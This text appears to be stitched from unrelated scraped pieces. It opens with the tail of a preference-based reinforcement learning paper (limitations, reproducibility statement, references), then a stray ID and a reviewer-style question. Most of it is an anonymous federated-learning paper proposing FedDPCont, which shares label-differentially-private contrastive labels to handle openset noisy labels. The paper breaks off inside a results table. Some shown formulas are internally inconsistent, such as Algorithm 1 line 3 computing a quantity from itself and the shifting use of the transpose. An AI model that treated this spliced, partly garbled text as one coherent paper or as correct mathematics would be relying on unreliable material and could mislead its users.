inputs due to the potential for slower processing speeds when working with high-dimensional inputs in optimal transport. Secondly, the efficiency of our algorithm rely on the same action space between source and target tasks. So our method is not suitable for the tasks like those have completely different state and action spaces. A potential solution may be utilizing representation learning methods to obtain trajectory representations and using Gromov-Wasserstein distance to align in the representation space (Chen et al., 2020; Li et al., 2022). We recognize these limitations and view the mitigation of these issues as important directions for future exploration and development. REPRODUCIBILITY STATEMENT The source code will be provided in an anonymous repository and we will post it as a comment in the discussion phase. If the paper is accepted, we will open source the code on our website. The experimental details are included in Section 5.1 and Appendix C. REFERENCES Yuntao Bai, Andy Jones, Kamal Ndousse, Amanda Askell, Anna Chen, Nova DasSarma, Dawn Drain, Stanislav Fort, Deep Ganguli, Tom Henighan, et al. Training a helpful and harmless assistant with reinforcement learning from human feedback. arXiv preprint arXiv:2204.05862, 2022. Christopher Berner, Greg Brockman, Brooke Chan, Vicki Cheung, Przemyslaw Debiak, Christy Dennison, David Farhi, Quirin Fischer, Shariq Hashme, Christopher Hesse, Rafal Józefowicz, Scott Gray, Catherine Olsson, Jakub Pachocki, Michael Petrov, Henrique Pondé de Oliveira Pinto, Jonathan Raiman, Tim Salimans, Jeremy Schlatter, Jonas Schneider, Szymon Sidor, Ilya Sutskever, Jie Tang, Filip Wolski, and Susan Zhang. Dota 2 with large scale deep reinforcement learning. CoRR, abs/1912.06680, 2019. Ralph Allan Bradley and Milton E Terry. Rank analysis of incomplete block designs: I. the method of paired comparisons. Biometrika, 39(3/4):324–345, 1952. Jie Chang, Zhonghao Lan, Changmao Cheng, and Yichen Wei. Data uncertainty learning in face recognition. In Proceedings of the IEEE/CVF conference on computer vision and pattern recognition, pp. 5710–5719, 2020. Liqun Chen, Zhe Gan, Yu Cheng, Linjie Li, Lawrence Carin, and Jingjing Liu. Graph optimal transport for cross-domain alignment. In International Conference on Machine Learning (ICML), pp. 1542–1553. PMLR, 2020. Paul F Christiano, Jan Leike, Tom Brown, Miljan Martic, Shane Legg, and Dario Amodei. Deep reinforcement learning from human preferences. In Advances in Neural Information Processing Systems (NeurIPS), volume 30. Curran Associates, Inc., 2017. Samuel Cohen, Brandon Amos, Marc Peter Deisenroth, Mikael Henaff, Eugene Vinitsky, and Denis Yarats. Imitation learning from pixel observations for continuous control. In Deep RL Workshop NeurIPS 2021, 2021. URL https://openreview.net/forum?id=Xe5MFhFvYGX. Robert Dadashi, Leonard Hussenot, Matthieu Geist, and Olivier Pietquin. Primal wasserstein imitation learning. In International Conference on Learning Representations (ICLR), 2021. URL https://openreview.net/forum?id=TtYSU29zgR. Bharath Bhushan Damodaran, Benjamin Kellenberger, Rémi Flamary, Devis Tuia, and Nicolas Courty. Deepjdot: Deep joint distribution optimal transport for unsupervised domain adaptation. In Proceedings of the European conference on computer vision (ECCV), pp. 447–463, 2018. Arnaud Fickinger, Samuel Cohen, Stuart Russell, and Brandon Amos. Cross-domain imitation learning via optimal transport. In International Conference on Learning Representations (ICLR), 2022. URL https://openreview.net/forum?id=xP3cPg2hQC. Rémi Flamary, Nicolas Courty, Alexandre Gramfort, Mokhtar Z Alaya, Aurélie Boisbunon, Stanislas Chambon, Laetitia Chapel, Adrien Corenflos, Kilian Fatras, Nemo Fournier, et al. Pot: Python optimal transport. The Journal of Machine Learning Research, 22(1):3571–3578, 2021. Siddhant Haldar, Vaibhav Mathur, Denis Yarats, and Lerrel Pinto. Watch and match: Supercharging imitation with regularized optimal transport. In Conference on Robot Learning (CoRL), pp. 32–43. PMLR, 2023a. Siddhant Haldar, Jyothish Pari, Anant Rai, and Lerrel Pinto. Teach a robot to fish: Versatile imitation from one minute of demonstrations. arXiv preprint arXiv:2303.01497, 2023b. Joey Hejna and Dorsa Sadigh. Inverse preference learning: Preference-based rl without a reward function. arXiv preprint arXiv:2305.15363, 2023.
TfbpnxTJt3
If the server does not aggregate the DP private label feedback by users, but only uses the DP private label of any individual user to perform the steps in line 9 of Algorithm 1, can the server calculate the real local label distribution of the user? Does this imply a leak of privacy?
Federated Learning with Local OpenSet Noisy Labels Anonymous authors Paper under double-blind review Abstract Federated learning is a learning paradigm that allows the central server to learn from different data sources while keeping the data private locally. Without controlling and monitoring the local data collection process, the locally available training labels are likely noisy, i.e., the collected training labels differ from the unobservable ground truth. Additionally, in heterogeneous FL, each local client may only have access to a subset of label space (referred to as openset label learning), meanwhile without overlapping with others. In this work, we study the challenge of federated learning with local openset noisy labels. We observe that many existing solutions in the noisy label literature, e.g., loss correction, are ineffective during local training due to overfitting to noisy labels and being not generalizable to openset labels. To address the problems, we design a label communication mechanism that shares randomly selected “contrastive labels” among clients. The privacy of the shared contrastive labels is protected by label differential privacy (DP). Both the DP guarantee and the effectiveness of our approach are theoretically guaranteed. Compared with several baseline methods, our solution shows its efficiency in several public benchmarks and real-world datasets under different noise ratios and noise models. 1 Introduction Data heterogeneity is a common issue among different data centers. The label spaces of the data centers are likely different due to the heterogeneity of data sources. For example, the virus variants during the pandemic may differ in different regions, leading to an extremely heterogeneous data distribution among data centers. The heterogeneity challenges collaborations among data centers, e.g., federated learning (FL), where each data center joins as a client to train a uniform and stronger global model for all the regions without sharing the sensitive data. In addition to a heterogeneous label space, what makes matters worse is that the observed label space may be noisy due to the limited knowledge access between different data centers, making this problem more challenging. This paper aims to provide solutions for a practical FL setting where not only do each client’s training labels carry different noise rates, but the observed label space at these clients can also be noisy and differ, even though their underlying clean labels are drawn from the same label space. We call that such a federated learning system has local openset noise problems if the observed label space is noisy and differs across clients. The above local openset label noise will pose significant challenges if we apply the existing learning with noisy label solutions locally at each client. For instance, a good number of these existing solutions operate with centralized training data and rely on the design of robust loss functions (Natarajan et al., 2013; Patrini et al., 2017; Ghosh et al., 2017; Zhang & Sabuncu, 2018; Feng et al., 2021; Wei & Liu, 2021; Zhu et al., 2021a). Implementing these approaches often requires assumptions, which are likely to be violated if we directly employ these centralized solutions in a federated learning setting. For example, loss correction is a popular design of robust loss functions (Patrini et al., 2017; Natarajan et al., 2013; Liu & Tao, 2015; Scott, 2015; Jiang et al., 2022), where the key step is to estimate the label noise transition matrix correctly (Bae et al., 2022; Zhang et al., 2021b; Zhu et al., 2021b, 2022). Correctly estimating the label noise transition matrix requires observing the full label space, when the ground-truth labels are unavailable. In FL, where the transition matrix is often estimated only with the local openset noisy labels, existing estimators of the noise transition matrix would fail. Moreover, even though we can have the best estimate of the noise transition matrix if we have the ground-truth labels for the local instances, the missing of some label classes would make the estimate different from the ground-truth one, and again leads to failures (detailed example in Section 3.1). Intuitively, we may share some label information among the clients to generalize some centralized training methods to FL. However, it is against privacy protection, making it challenging in real usage. Moreover, it is also important to figure out what kind of label information is sufficient to solve the local openset noisy problems in FL. In this paper, we use the global label distribution as a hint to local clients, where the hint is used in a contrastive way to avoid overfitting to noisy labels. To protect privacy during label communication, we randomly flip the shared labels to ensure label differential privacy (DP). Our contributions are summarized as follows. - We formally define the openset noise problem in FL, which is more practical than the existing heterogeneous noisy label assumptions. The challenges along with the openset noise are also motivated by analyzing the failure cases of the existing popular noisy learning solutions such as loss correction (Natarajan et al., 2013; Patrini et al., 2017; Liu & Tao, 2015). - We propose a novel framework, FedDPCont, to solve the openset label noise problem, which builds on the idea of using globally shared private contrastive labels to avoid overfitting to local noisy labels. - To mitigate the gap between the centralized usage of noisy labels and the federated one, we propose a label communication algorithm with a differential privacy (DP) guarantee. We also prove that benefiting from label communication, the gradient update of aggregating local loss with private labels is guaranteed to be the same as the corresponding centralized loss, and further establish its robustness to label noise. - We empirically compare FedDPCont with several baseline methods on both benchmark datasets and practical scenarios, showing that, in terms of FL with openset label noise, directly applying centralized solutions locally cannot work and FedDPCont significantly improves the performance. 2 RELATED WORKS Federated learning is a collaborative training method to make full use of data from every client without sharing the data. FedSGD (Shokri & Shmatikov, 2015) is the way of FL to pass the gradient between the server and the clients. To improve the performance, FedAvg (McMahan et al., 2017) is proposed and the model weight is passed between the server and the clients. In practice, openset problem is common in FL because the source of every client may vary a lot and it is very likely to find that some of the classes are unique in the specific clients. There are a lot of works to analyze and solve the non-IID problem in FL (Zhao et al., 2018; Li et al., 2019, 2021; Zhang et al., 2021a; Li et al., 2020b; Karimireddy et al., 2020; Andreux et al., 2020). Label noise is common in the real world (Agarwal et al., 2016; Xiao et al., 2015; Zhang et al., 2017; Wei et al., 2022b). Traditional works on noisy labels usually assume the label noise is class-dependent, where the noise transition probability from a clean class to a noisy class only depends on the label class. There are many statistically guaranteed solutions based on this assumption (Natarajan et al., 2013; Menon et al., 2015; Liu & Tao, 2015; Liu & Guo, 2020). However, this assumption fails to model the situation where different group of data has different noise patterns (Wang et al., 2021). For example, different clients are likely to have different noisy label spaces, resulting totally different underlying noise transitions. Existing works on federated learning with noisy labels mainly assume the noisy label spaces are identical across different clients (Yang et al., 2022; Xu et al., 2022). There are other notable centralized solutions relying on the memorization effect of a large model (e.g., deep neural network) (Li et al., 2020a; Liu, 2021; Song et al., 2019; Xia et al., 2021; Liu et al., 2020; Cheng et al., 2020). However, in a federated learning system, simply relying on the memorization effect would fail, i.e., the model can perfectly memorize all local noisy samples during local training, since the local data is likely to be imbalanced and with a limited amount (Han et al., 2020; Liu, 2021). The idea of contrastive labels is to punish the overfitting, which is supposed to avoid memorizing openset local noisy samples. Besides, the concept “openset” is also used in Tuor et al. (2021), where the focus is on the out-of-distribution features and their labels are called openset noise. It is different from ours since they did not focus on in-distribution mislabeled data. 3 FORMULATIONS AND MOTIVATIONS Federated learning Consider a $K$ class classification problem in a federated learning system with $C$ clients. Each client $c \in [C] := \{1, \cdots, C\}$ holds a local dataset $D_c := \{(x_n^c, y_n^c)\}_{n \in [N_c]}$, where $N_c$ is the number of instances in $D_c$ and $N_c := \{1, \cdots, N_c\}$. Assume there is no overlap among $D_c$, $\forall c$. Denote the union of all the local datasets by $D := \{(x_n, y_n)\}_{n \in [N]}$. Clearly, we have $D = \bigcup_{c \in [C]} D_c$ and $N = \sum_{c \in [C]} N_c$. Denote by $D_c$ the local data distribution, $(X^c, Y^c) \sim D_c$ the local random variables of feature and label, $D$ the global/centralized data distribution, and $(X, Y) \sim D$ the corresponding global random variables. Denote by $\mathcal{X}$, $\mathcal{X}_c$, $\mathcal{Y}$, and $\mathcal{Y}_c$ the space of $X$, $X_c$, $Y$, and $Y_c$, respectively. FL builds on the following distributed optimization problem: $$\arg\min_\theta \sum_{c \in [C]} \frac{N_c}{N} \cdot L_c(\theta),$$ where $f$ is the classifier, $\theta$ is the parameter of $f$. $f$ and $f'$ stand for the same model but different output. $f := \arg\max_{i \in [K]} f_i$. To this end, the local training and global model average are executed iteratively. In local training, each client learns a model $f_c : \mathcal{X} \to \mathcal{Y}$ with its local dataset $D_c$ by minimizing the empirical loss $L_c(\theta_c)$ defined as: $$L_c(\theta_c) := \frac{1}{N_c} \sum_{n \in [N_c]} \ell(f_c(x_n^c; \theta_c), y_n^c),$$ where for classification problems, the loss function is usually the cross-entropy (CE) loss: $$\ell(f(X; \theta), Y) = -\ln(f(X; \theta)[Y]), Y \in [K],$$ indicating taking the negative logarithm of the $Y$-th element of $f$ given input $X$ and model parameter $\theta$. In the following global model average, each client $c$ sends its model parameter $\theta_c$ to the central server, which is further aggregated following FedAvg (McMahan et al., 2017): $$\theta = \sum_{c \in [C]} \frac{N_c}{N} \cdot \theta_c.$$ 3.1 Openset noise in Federated Learning When the label $y$ is corrupted, the clean dataset $D$ becomes the noisy dataset $\tilde{D} := \{(x_n, \tilde{y}_n)\}_{n \in [N]}$ where $\tilde{y}_n$ is the noisy label and possibly different from $y_n$. The noisy data $(x_n, \tilde{y}_n)$ can be viewed as the specific point of the random variables $(X, \tilde{Y})$ which is from the distribution $\tilde{D}$. Noise transition matrix $T$ characterizes the relationship between $(X, Y)$ and $(X, \tilde{Y})$. The shape of $T$ is $K \times K$ where $K$ is the number of classes in $D$. The $(i, j)$-th element of $T$ represents the probability of flipping a clean label $Y = i$ to noisy label $\tilde{Y} = j$, i.e., $T_{ij} := P(\tilde{Y} = j | Y = i)$. If $\tilde{Y} = Y$ always holds, $T$ is an identity matrix. Note the above definition builds on the assumption that $T$ is class-dependent, which is a common assumption in centralized learning with noisy labels (Natarajan et al., 2013; Menon et al., 2015; Liu & Tao, 2015). However, in FL, $T$ is likely to be different for different clients (a.k.a. group-dependent (Wang et al., 2021)). Specifically, we use $T$ to denote the global noise transition matrix for $\tilde{D}$ and $T_c$ to denote the local noise transition matrix for $\tilde{D}_c$. In a practical federated learning scenario where the data across different clients are non-IID, different clients may have different label spaces. When the labels are noisy, we naturally have the following definition of openset label noise in FL. Definition 1 (Openset noisy labels in FL). The label noise in client $c$ is called openset if $\mathcal{Y}_c \neq \tilde{\mathcal{Y}}$. Generation of openset noise We propose the following noise generation process to model openset label noise in practical FL systems. Denote by $I_{c,k}$ the indicator random variable that label class $k$ is included in client $c$, where $I_{c,k} = 1$ (w.p. $Q_{c,k}$) indicates client $c$ has data belonging to class $k$ and $I_{c,k} = 0$ otherwise. The indicators $\{I_{c,k} | \forall c \in [C], k \in [K]\}$ are generated independently with the probability matrix $Q$, where the $(c, k)$-th element is $Q_{c,k} := E[I_{c,k}]$. In practice, if all the elements in $\{I_{c,k} | k \in [K]\}$ are identical, meaning the client $c$ can observe nothing or all the classes, then $\{I_{c,k} | k \in [K]\}$ will be re-generated until client $c$ is an openset client. Denote by $I_k := \{c | I_{c,k} = 1, c \in [C]\}$ the set of clients that include class $k$. Denote by $\tilde{D}^{(k)} = \{n | \tilde{y}_n = k\}$ the indices of instances that are labeled as class $k$. For each $k \in [K]$, instances in $\tilde{D}^{(k)}$ will be distributed to clients with $I_{c,k} = 1$ either uniformly or non-uniformly as follows. - Uniform allocation: Randomly sample (without replacement) $|\tilde{D}^{(k)}| / |I_k|$ indices from $\tilde{D}^{(k)}$ and allocate the corresponding instances to client $c$. Repeat for all $c \in I_k$. - Non-uniform allocation: Generate probabilities $\{u_c | c \in I_k\}$ from Dirichlet distribution $\text{Dir}(1)$ with parameter $1 := [1, \cdots, 1]$ ($|I_k|$ values). Randomly sample (without replacement) $|\tilde{D}^{(k)}| \cdot u_c$ indices from $\tilde{D}^{(k)}$ and allocate the corresponding instances to client $c$. Repeat for all $c \in I_k$. In this way, all the clients have openset label noise, i.e., $\mathcal{Y}_c \neq \tilde{\mathcal{Y}}, \forall c \in [C]$. Example Consider the following example. For a data distribution \((X,Y) \sim D\) where \(Y \in \mathcal{Y} := \{1, 2, \cdots, K\}\), the set of all the opensets is the combination of \(\mathcal{Y}\) except the full set of \(\mathcal{Y}\) and the empty set. For example, if \(\mathcal{Y}\) is \(\{1, 2, 3\}\), there would be \(2^K - 2 = 6\) different combinations of the noisy label space: \(\{1, 2, 3, (1, 2), (1, 3), (2, 3)\}\). It should be noted that it is still possible that the union of all the clients still cannot cover \(\mathcal{Y}\). An example of the real and openset \(T\) in the 3-class classification problem is as follows. Suppose the real noise transition matrix \(T_{\text{real}}\) is shown on the LHS. However, if we only observe \(\tilde{\mathcal{Y}}_c = \{1, 2\}\) in client \(c\), the optimal estimate of \(T\) relying only on \(\tilde{D}_c\) could only be \(T_{\text{OptEst}}\) even though we know \(D_c\). This is because when \(\tilde{\mathcal{Y}}_c = \{1, 2\}\), we have \(\mathbb{P}(\tilde{Y} = 3) = 0 \Rightarrow \mathbb{P}(\tilde{Y} = 3|Y = 3) = 0\), resulting that the other two probabilities have to be normalized from \((1/16, 3/16)\) to \((1/4, 3/4)\) to get a total probability of 1. \[ T_{\text{real}} = \begin{bmatrix} 1 & 0 & 0 \\ 1/3 & 2/3 & 0 \\ 1/16 & 3/16 & 3/4 \end{bmatrix}, \quad T_{\text{OptEst}} = \begin{bmatrix} 1 & 0 & 0 \\ 1/3 & 2/3 & 0 \\ 1/4 & 3/4 & 0 \end{bmatrix} \] Local openset noise is challenging A good number of correction approaches in the learning with noisy labels literature would require using the transition matrix \(T\). For instance, loss correction (Patrini et al., 2017) is a popular tool to solve the noisy label problem as \[ \ell^\rightarrow(f(X), \tilde{Y}) := \ell(T^\top f(X), \tilde{Y}) \] where \(T^\top\) is the transpose of \(T\). The key step of the loss correction approach is to estimate a correct \(T\). However, if the label space is openset, the best estimated \(T\) will lead to a wrong prediction result. Based on the example above, the best-corrected output is \[ T^\top f(X) = \begin{bmatrix} 1 & 1/3 & 1/4 \\ 0 & 2/3 & 3/4 \\ 0 & 0 & 0 \end{bmatrix} \begin{bmatrix} f_1(X; \theta) \\ f_2(X; \theta) \\ f_3(X; \theta) \end{bmatrix} = \begin{bmatrix} f_1(X; \theta) + f_2(X; \theta)/3 + f_3(X; \theta)/4 \\ 2f_2(X; \theta)/3 + 3f_3(X; \theta)/4 \\ 0 \end{bmatrix}, \] where \(f = [f_1, f_2, f_3]^\top\) and \(f_n\) is the \(n\)-th element of \(f\). The model cannot distinguish class 3 which is reasonable. However, it will misclassify class 2 to class 3 because class 3 has a larger weight. For example, given an instance \((x, y = 2)\), the cross entropy loss is \(-\ln(2f_2(x; \theta)/3 + 3f_3(x; \theta)/4)\) where \(f_3(x; \theta) = 1\) leads to the minimization of the loss, making the loss correction fail. 3.2 Our Motivation and Building Idea The above example highlights the challenge of adapting approaches that use noise transition matrix \(T\) to our openset FL setting. Therefore, we hope to circle around by building our solutions upon ideas that do not require the knowledge of \(T\). According to the previous analyses, the main difficulty of local openset label noise exists in the mismatch of clean and noisy label spaces within a local client. Changing the label space is challenging in FL since it often requires sharing data between clients. Therefore, we need to solve two technical challenges here: 1) What kind of information can be shared to mitigate the heterogeneity introduced by local openset label noise? 2) How do we use the shared information to help training? For the first challenge, we consider sharing the “private labels” since only sharing the label without disclosing features is usually less sensitive than sharing features in many cases, e.g., face recognition. Additionally, it is relatively easier to protect the label privacy by random responses (Ghazi et al., 2021). For the second challenge, given only the private labels, we propose to use them “contrastively” to punish the overfitting of noisy labels. Intuitively, for a multi-class classification task, e.g., 10 classes, a randomly picked private label \(\tilde{y}_n\) is likely to be a wrong label for a randomly picked feature \(x_n\). Therefore, rather than guiding the model the memorize this pattern, we can just use it contrastively or negatively, i.e., \(-\ell(f(x_n), \tilde{y}_n)\). Therefore, the new loss function with Private Labels becomes \[ \ell_{PL}(f(x_n), \tilde{y}_n) := \ell(f(x_n), \tilde{y}_n) - \ell(f(x_n), \tilde{y}_n'). \] The design is related to works such as (Wei et al., 2022a; Liu & Guo, 2020; Cheng et al., 2020), while the key difference is the selection of the labels for the second term, i.e., the private labels are drawn from the whole label space while directly using the above approach requires getting labels locally. Intuitively, the “new” label has to be sampled globally; otherwise, the global information is missing and the negative effect of local openset label noise would induce performance degradation. Additionally, label communications in FL should be private. We defer the detailed explanation of its necessity to Appendix B.3. 4 PROPOSED METHOD We propose the following label communication-aided algorithm FedDPCont, which we also illustrate in Figure 1. There are two critical stages to guarantee the success of the proposed methods with good DP protection: - **Stage 1**: Privacy-preserving global label communication given in Section 4.1 - **Stage 2**: Contrastive gradient updates at the local client using \( \ell_{PL} \) given in Section 4.2 and the shared label information from Stage 1. 4.1 LABEL COMMUNICATION Label privacy protection is an essential feature of FL so we cannot pass \( \tilde{Y} \) to the other clients, directly. To protect privacy, we adopt the label differential privacy (DP) as Definition 2. **Definition 2** (Label Differential Privacy [Ghazi et al., 2021]). Let \( \epsilon > 0 \). A randomized algorithm \( A \) is said to be \( \epsilon \)-label differentially private (\( \epsilon \)-labelDP) if for any two training datasets \( D \) and \( D' \) that differ in the label of a single example, and for any subset \( S \) of outputs of \( A \), \[ \mathbb{P}(A(D) \in S) \leq e^{\epsilon} \cdot \mathbb{P}(A(D') \in S). \] The high-level idea is to achieve label privacy (DP), each client \( c \) will use a symmetric noise transition matrix \( T_{DP} \) to flip their local labels to protect their labelDP: \[ T_{DP}[y, \tilde{y}] := \mathbb{P}(\tilde{Y} = \tilde{y} | Y = y) = \begin{cases} \frac{e^{\epsilon}}{e^{\epsilon} + K - 1}, & \text{if } \tilde{y} = y, \\ \frac{1}{e^{\epsilon} + K - 1}, & \text{if } \tilde{y} \neq y. \end{cases} \] where \( K \) is the number of classes. Then only the flipped labels are shared between the clients and the server. It is easy to show that sharing the flipped labels using \( T_{DP} \) suffices to preserve labelDP: **Theorem 1** (Label Privacy in FedDPCont). Label sharing in FedDPCont is \( \epsilon \)-labelDP. Denote by \( \tilde{p}_n^c \) the one-hot encoding of \( \tilde{y}_n^c \). The whole label communication process is presented in Algorithm 1. At the beginning of the algorithm, the server will initialize \( T_{DP} \) according to \( \epsilon \) and broadcast \( T_{DP} \) to all \( C \) clients. For each client \( c \), it calculates the DP label distribution of every data point \((x_n^c, \tilde{y}_n^c)\) as \( \tilde{p}_n^c = T_{DP}^\top p_n^c \), where \( p_n^c \) is the distribution of DP label in client \( c \). With this distribution, the client generates the DP private label \( \tilde{y}_n^c, n \in [N_c] \) for every data point and every client sends all \( \tilde{y}_n^c \) back to the server. After obtaining all \( \tilde{y}_n^c \) from the clients, the server aggregates the label and calculates the posterior label distribution \( \tilde{p} \). To restore the correct distribution of \( Y \), the server calculates \((T_{DP}^\top)^{-1}\tilde{p}\). Note that \[ (T_{DP}^\top)^{-1}T_{DP}^\top \left( \sum_{i=1}^{C} \tilde{p}_n^c \right)/C = \tilde{p}. \] To apply \( T_{DP} \) and \((T_{DP})^{-1}\) sequentially, FedDPCont enables the clients to share the information with the others while DP is guaranteed. Finally, the client calculates the local loss according to Equation (5), where \( \tilde{Y} \) is sampled from \( \mathbb{P}(\tilde{Y} = i) := ((T_{DP}^\top)^{-1}\tilde{p})[i] \). This label communication procedures guarantees \( \epsilon \)-DP. 4.2 FedDPCont Based on the distribution \( \mathbb{P}(\tilde{Y}|\tilde{D}) \), we propose FedDPCont, a novel framework based on FedAvg, to solve the local openset noise problem. Denote by \( \Delta^{(r)}_c := \theta^{r+1}_c - \theta^r_c \), the variation of model parameters in the \( r \)-th round of the local training in client \( c \). Recall \( \theta_c \) is the parameter of \( f_c \). Denote by \( \Delta^{(r)} := \theta^{r+1} - \theta^r \) the variation of model parameters in the \( r \)-th round of the corresponding global gradient descent update assuming the local data are collected to a central server. Define \( \mathbb{P}(D_c|D) := \mathbb{P}((X,Y) \sim D_c | (X,Y) \sim D) \). Numerically, it is calculated as \( N_c/N \) for client \( c \) given \( D \). We have the following theorem for the calibration property of FedDPCont. Algorithm 1 Label Communication in FedDPCont 1: **Initialization:** The server initializes $T_{DP}$ according to $\epsilon$ and broadcasts $T_{DP}$ to all clients. 2: **for** $c$ in $C$ clients **do** 3: calculate $\tilde{p}_n^c = T_{DP} \tilde{p}_n^c$, $\forall n \in [N_c]$. 4: generate the private label $\tilde{y}_n^c$ using $\mathbb{P}(\tilde{y}_n^c = i) = p_n^c[i]$, $\forall i \in [K], n \in [N_c]$. 5: send $\{\tilde{y}_n^c\}_{n \in [N_c]}$ to the server 6: **end for** 7: The server aggregates the label $\{\tilde{y}_n^c\}_{n \in [N_c]}$ sent from all $C$ clients. 8: The server calculates the posterior label distribution $\tilde{p}$: $\tilde{p}[i] := \frac{1}{N} \sum_{c=1}^{C} \sum_{n=1}^{N} 1(\tilde{y}_n^c = i)$. 9: The server calculates $(T_{DP}^\top)^{-1}\tilde{p}$ and sends it to each client $c$. 10: The client $c$ samples the $\tilde{y}_{n'}$ in Eqn. (3) following $\mathbb{P}(Y = \tilde{y}_{n'}) = ((T_{DP}^\top)^{-1}\tilde{p})[\tilde{y}_{n'}]$. --- Figure 1: The illustration of FedDPCont. **Step 1** is the $T_{DP}$ generation where the server generates $T_{DP}$ according to $\epsilon$ and sends it to each client. After receiving $T_{DP}$, **Step 2** is the label communication. Every client $c$ calculates DP label $\tilde{Y}_c$ according to $T_{DP}$ and the noisy label $\tilde{Y}_c$. Clients send $\tilde{Y}_c$ to the server. The server aggregates every $\tilde{Y}_c$, calculates the posterior label distribution $\tilde{p}$ and sends $(T_{DP}^\top)^{-1}\tilde{p}$ to every client for the contrastive term sampling. **Step 3** is the loss calculation using the noisy label $\tilde{Y}_c$ on every client $c$, the model prediction $\hat{Y}_c$ and $Y_{c}'$ sampled from $(T_{DP}^\top)^{-1}\tilde{p}$ and calculate loss. **Step 4** is the back-propagation for contrastive gradient updates. Theorem 2 (Local clients with FedAvg). The aggregated model update of FedDPCont is the same as the corresponding centralized model update, i.e., $$\sum_{c \in [C]} \mathbb{P}(D_c | D) \cdot \Delta_c^{(r)} = \Delta^{(r)},$$ Theorem 2 shows that the extra effect of local openset label noise can be mitigated by sharing private labels and FedAvg. Note the theorem only discusses the case in the expectation level (infinite data size), meaning the gap between distributed learning and centralized learning given limited data still exists. Given Theorem 2, we can further show $\ell_{PL}$ is robust to label noise as what has been done for centralized training [Liu & Guo, 2020]. The details of FedDPCont are shown in Algorithm 2. At the beginning of FedDPCont, the server and the clients $c$ initialize the model and each client $c$ initializes its own dataset $D_c = \{X_c, Y_c\}$ and loss function $\ell$. After this, the server generates the DP matrix $T_{DP}$ and sends it to every client and every client $c$ can generate DP labels $\tilde{y}_n^c$. Next, every client $c$ sends $\tilde{y}_n^c$ to the server, and the server aggregates DP labels according to Section 4.1. After aggregation at the server, a posterior label... Algorithm 2 FedDPCont. 1: **Server:** initialize model $f_g$, global step size $\alpha_g$ and global communication round $R$. 2: **Each Client** $c$: initialize model $f_c$, the dataset $D_c = \{(x_n^c, y_n^c)\}_{n \in [N_c]}$, local learning rate $\alpha_c$ and local updating iterations $E$. 3: The server generates and broadcasts $T_{\text{DP}}$ to all clients according to Definition 2. 4: Clients generate DP labels $\tilde{y}_n^c$ and send $\tilde{y}_n^c$ to the server according to Section 4.1. 5: The server aggregates $\tilde{y}_n^c$ and calculate the posterior label distribution $\bar{p}$. 6: The server send $(T_{\text{DP}})^{-1}\bar{p}$ to each client. 7: for $i = 1 \rightarrow R$ do 8: Randomly select $C'$ clients from $C$ according to $\lambda$ 9: for $c$ in $C'$ clients do 10: $f_c \leftarrow f$ 11: for $j = 1 \rightarrow E$ do 12: $\hat{y}_n^c \leftarrow f_c(x_n^c), \forall n \in [N_c]$ 13: Sample $(y_n^c)'$ following $(T_{\text{DP}})^{-1}\bar{p}, \forall n \in [N_c]$. 14: $L_c \leftarrow \frac{1}{N_c} \sum_{n=1}^{N_c} (\ell(\hat{y}_n^c, \tilde{y}_n^c) - \ell(\hat{y}_n^c, (y_n^c)'))$ 15: $f_c \leftarrow f_c - \alpha_c \cdot \nabla L_c$ 16: end for 17: end for 18: $f \leftarrow f - \alpha_g \cdot \sum_{c=1}^{C'} (f_c - f)$ 19: end for distribution $\bar{p}$ can be computed and the server sends $(T_{\text{DP}})^{-1}\bar{p}$ back to the client so that the client can sample the private label from this distribution. To simulate the practical usage, only part of rather than all clients will participate in the training in one round. The clients are chosen randomly according to the federated fraction $\lambda$. The selected clients sample the “contrastive label” $Y'_c$ from the distribution $(T_{\text{DP}})^{-1}\bar{p}$ and calculate the loss $L_c$ according to Eq. (3) by using the output of the model $\hat{Y}_c$. The model weight is updated by $L_c$ and the server weight is averaged according to FedAvg (McMahan et al., 2017), which is the end of one communication round. Privacy Issue. We are aware that the label distribution recovered by our algorithm may also be a concern of privacy. However, the existing works about the attack in federated learning are mainly from embedding layers (Melis et al., 2019), fully-connected layers (Zhao et al., 2020; Geiping et al., 2020; Pan et al., 2020), and model gradients (Aono et al., 2017; Melis et al., 2019). Different from the leakage of individual labels, the recovered label distribution by our algorithm has much less information. There is no direct evidence of the harm of leaking an imperfect label distribution to the best of our knowledge. In Table 3, we will illustrate that different DP privacy level ($\epsilon$) corresponds to different performance, indicating that, even though we have restored the distribution of $\tilde{Y}$ (Algorithm 1, Line 9), it is still different from the original one. 5 EXPERIMENTS AND RESULTS 5.1 Experiments Setup To validate the generality and effectiveness of FedDPCont, we select several public datasets with various levels of difficulties, including CIFAR-10, CIFAR-100 (Krizhevsky et al., 2009) as benchmark datasets and CIFAR-N (Wei et al., 2022b), Clothing-1M (Xiao et al., 2015) as real-world datasets. To simulate the practical usage, we first apply the noise on the label and generate the opensest candidates according to the number of classes $K$ for every client because only the noisy label is visible to the client in the real world. On CIFAR-10 and CIFAR-100, we apply the symmetric noise for benchmark testing while we apply random noise for practical simulation. Furthermore, we also test the performance using Clothing-1M and CIFAR-N to test the performance of FedDPCont in real-world scenarios. For baseline methods, we use FedAvg (McMahan et al., 2017), forward loss correction (LC) (Patrini et al., 2017), FedProx (Li et al., 2020b), Co-teaching (Han et al., 2018) and T-revision (Xia et al., 2019), FedBN (Li et al., 2021), FedDyn (Acar et al., 2021), Scaffold (Karimireddy et al., 2020). Table 1: The performance (the best accuracy) of all methods on CIFAR-10 and CIFAR-100. FedDPCont is always the best method. | Dataset | Methods | 0.2 | 0.4 | 0.6 | 0.8 | Symmetric | 0.2 | 0.4 | 0.6 | 0.8 | Random | |---------|---------|-----|-----|-----|-----|-----------|-----|-----|-----|-----|--------| | CIFAR-10 | FedAvg | 76.84±0.91 | 63.34±1.82 | 43.83±0.51 | 22.13±1.25 | 76.24±1.48 | 59.19±1.09 | 46.80±2.63 | 21.80±0.28 | | | LC | 79.14±0.38 | 63.57±0.61 | 44.33±1.13 | 22.98±1.60 | 74.96±1.92 | 61.49±3.02 | 40.52±2.18 | 23.84±3.37 | | | FedProx | 70.54±0.57 | 59.35±0.65 | 45.61±0.97 | 22.70±1.10 | 68.51±0.92 | 58.61±0.38 | 43.97±1.06 | 24.64±2.59 | | | Co-teaching | 78.64±0.45 | 70.60±0.47 | 48.63±0.57 | 21.06±2.10 | 75.11±0.39 | 59.00±1.19 | 31.30±2.03 | 17.10±3.78 | | | T-revision | 69.16±0.20 | 51.86±6.64 | 42.93±2.56 | 15.27±1.14 | 64.69±1.08 | 46.22±1.08 | 31.80±0.83 | 17.12±0.73 | | | FedDyn | 67.97±0.97 | 53.97±0.14 | 